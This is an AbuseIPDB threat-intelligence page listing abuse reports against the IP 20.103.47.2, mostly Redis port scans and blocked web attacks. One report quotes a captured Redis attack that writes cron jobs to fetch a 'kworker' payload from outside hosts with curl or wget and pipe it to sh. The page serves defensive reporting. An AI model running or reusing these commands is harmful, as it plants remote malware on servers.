JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 20.103.47.2

20.103.47.2 was found in our database!

This IP was reported 36 times. Confidence of Abuse is 13%: ?

13%

ISP	Microsoft Corporation
Usage Type	Data Center/Web Hosting/Transit
ASN	AS8075
Domain Name	microsoft.com
Country	🇳🇱 Netherlands
City	Amsterdam, North Holland

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 20.103.47.2

Whois 20.103.47.2

IP Abuse Reports for 20.103.47.2:

This IP address has been reported a total of 36 times from 31 distinct sources. 20.103.47.2 was first reported on December 14th 2025, and the most recent report was 1 week ago.

Old Reports: The most recent abuse report for this IP address is from 1 week ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇺🇸 gu-alvareza	2026-06-02 07:05:23 (1 week ago)	React.Server.Components.react-flight.Remote.Code.Execution	Hacking Web App Attack
🇦🇺 paulshipley.com.au	2026-06-01 06:59:01 (1 week ago)	[Mon Jun 01 16:59:01.266489 2026] [security2:error] [pid 76949] [client 20.103.47.2:29012] [client 2 ... show more [Mon Jun 01 16:59:01.266489 2026] [security2:error] [pid 76949] [client 20.103.47.2:29012] [client 20.103.47.2] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/modsecurity/crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "94"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.4"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dlcarterauthor.com"] [uri "/"] [unique_id "ah0ttVrPoqeXKpcdHF6arAAAAAM"] ... show less	Web App Attack
🇬🇷 Xev	2026-03-02 21:27:20 (3 months ago)	Redis command execution Date: 2026-02-28 18:56:32 UTC Destination port: 6379 Executed commands: fl ... show more Redis command execution Date: 2026-02-28 18:56:32 UTC Destination port: 6379 Executed commands: flushall set backup1 /2 * * * cd1 -fsSL http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker \| sh set backup2 /3 * * * wget -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker \| sh set backup3 /4 * * * curl -fsSL http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker \| sh set backup4 /5 * * * wd1 -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker \| sh config set dir /var/spool/cron/ config set dir /var/spool/cron/crontabs flushall set backup1 /2 * * * root cd1 -fsSL http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker \| sh set backup2 /3 * * * root wget -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker \| sh set backup3 /4 * * * root curl -fsSL http://38.150.0.118/dewfhuewr4r89/98hy67//kworker \| sh set backup4 /5 * * * root wd1 -q -O- http://34.70.205.211... show less	IoT Targeted
🇨🇦 polycoda	2026-03-01 19:18:35 (3 months ago)	📡 Port scan	Hacking Web App Attack
🇺🇸 cazae	2026-02-28 16:29:45 (3 months ago)	Unauthorized attempt on debian [6379/tcp] Source port: 1296 TTL: 40 Packet length: 60 TOS: 0x00 htt ... show more Unauthorized attempt on debian [6379/tcp] Source port: 1296 TTL: 40 Packet length: 60 TOS: 0x00 https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan
🇳🇱 VMHeaven.io	2026-02-28 03:48:36 (3 months ago)	Blocked by UFW [6379/tcp] Source port: 1409 TTL: 48 Packet length: 60	Port Scan
🇧🇷 diego	2026-02-28 03:41:59 (3 months ago)	[rede-164-29] 02/28/2026-00:41:59.153620, 20.103.47.2, Protocol: 6, ET CINS Active Threat Intelligen ... show more [rede-164-29] 02/28/2026-00:41:59.153620, 20.103.47.2, Protocol: 6, ET CINS Active Threat Intelligence Poor Reputation IP group 12 show less	Hacking
🇩🇪 guldkage	2026-02-28 03:28:27 (3 months ago)	Unauthorized connection attempt detected from IP address 20.103.47.2 to port 6379 (ger-02) [REDIS]	Exploited Host
🇺🇸 COMPLEX	2026-02-28 03:22:04 (3 months ago)	Unsolicited TCP traffic \| Action: DROP \| Port 6379	Brute-Force
🇳🇱 VMHeaven.io	2026-02-27 03:16:13 (3 months ago)	Blocked by UFW [6379/tcp] Source port: 42823 TTL: 48 Packet length: 60	Port Scan
🇩🇪 guldkage	2026-02-27 02:55:39 (3 months ago)	Unauthorized connection attempt detected from IP address 20.103.47.2 to port 6379 (ger-02) [REDIS]	Exploited Host
🇧🇷 somosbr	2026-02-27 02:52:22 (3 months ago)	[2026-02-27T02:52:22Z] Unsolicited scan from 20.103.47.2 to port 6379/tcp	Port Scan
🇩🇪 centurion	2026-02-27 02:35:31 (3 months ago)	Blocked by UFW on ns02 [6379/tcp] Source port: 1280 TTL: 50 Packet length: 60 TOS: 0x00 This report ... show more Blocked by UFW on ns02 [6379/tcp] Source port: 1280 TTL: 50 Packet length: 60 TOS: 0x00 This report was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan
🇧🇷 diego	2026-02-27 02:31:28 (3 months ago)	[rede-164-29] 02/26/2026-23:31:27.944060, 20.103.47.2, Protocol: 6, ET CINS Active Threat Intelligen ... show more [rede-164-29] 02/26/2026-23:31:27.944060, 20.103.47.2, Protocol: 6, ET CINS Active Threat Intelligence Poor Reputation IP group 13 show less	Hacking
🇺🇸 cazae	2026-02-27 01:17:26 (3 months ago)	Unauthorized attempt on debian [6379/tcp] Source port: 1284 TTL: 40 Packet length: 60 TOS: 0x00 htt ... show more Unauthorized attempt on debian [6379/tcp] Source port: 1284 TTL: 40 Packet length: 60 TOS: 0x00 https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan

Showing 1 to 15 of 36 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇩🇪 2a0b:f4c2:2::55

🇺🇸 205.210.31.19

🇳🇱 176.65.139.126

🇷🇺 128.14.231.72

🇮🇳 122.160.69.233

🇧🇬 91.92.40.63

🇫🇷 85.217.140.19

🇺🇸 20.42.9.226

🇩🇪 192.109.200.220

🇺🇸 191.102.129.210

🇮🇳 115.247.87.98

🇹🇼 111.70.23.222

🇹🇼 110.25.110.136

🇺🇸 43.166.224.244

🇨🇱 34.176.187.54

🇺🇸 8.229.24.73

🇵🇰 2400:adc5:1b2:ef00:5dff:36e5:6adb:b483

🇬🇧 193.163.125.55

🇧🇪 34.38.81.244

🇳🇱 5.61.209.96